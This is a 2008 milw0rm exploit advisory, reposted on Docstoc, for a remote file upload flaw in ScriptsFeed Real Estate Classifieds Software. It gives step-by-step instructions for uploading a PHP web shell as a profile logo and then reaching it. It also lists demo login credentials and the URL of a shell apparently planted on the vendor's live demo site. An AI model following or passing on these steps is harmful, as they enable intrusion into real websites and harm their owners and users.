Docstoc

ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln

Document Sample
ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln Powered By Docstoc
					                       ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln         Page 1/2
  1    [~]   ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
  2    [~]
  3    [~]   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  4    [~]   Discovered By: ZoRLu
  5    [~]
  6    [~]   Date: 13.11.2008
  7    [~]
  8    [~]   Home: www.z0rlu.blogspot.com
  9    [~]
  10   [~]   contact: trt−turk@hotmail.com
  11   [~]
  12   [~]   N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
  13   [~]
  14   [~]   my bug number now: 39
  15   [~]
  16   [~]   my target bug number: 100
  17   [~]
  18   [~]   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  19
  20
  21   Exploit:
  22
  23   http://localhost/script/re_images/[id]_logo_your_shell.php
  24
  25   you register to site
  26
  27   register: http://localhost/script/register.php
  28
  29   after you login to site
  30
  31   login: http://localhost/script/login.php
  32
  33   more after you go profile edit
  34
  35   profile: http://localhost/script/profile.php
  36
  37   and you upload your_shell.php right click to your logo and select properties copy link
  38
  39   paste your explorer go your_shell.php
  40
  41   your_shell.php path:
  42
  43   http://localhost/script/re_images/[id]_logo_your_shell.php
  44
  45
  46
  47   rfu for demo:
  48
  49   user: zorlu
  50
  51   passwd: zorlu1
  52

ZoRLu                                                                                           11/13/2008
                     ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln   Page 2/2
  53   shell path:
  54
  55   http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
  56
  57
  58   [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  59   [~] Greetz tO: str0ke & all Muslim HaCkeRs
  60   [~]
  61   [~] yildirimordulari.org & darkc0de.com
  62   [~]
  63   [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  64
  65   # milw0rm.com [2008−11−13]




ZoRLu                                                                                   11/13/2008

				
DOCUMENT INFO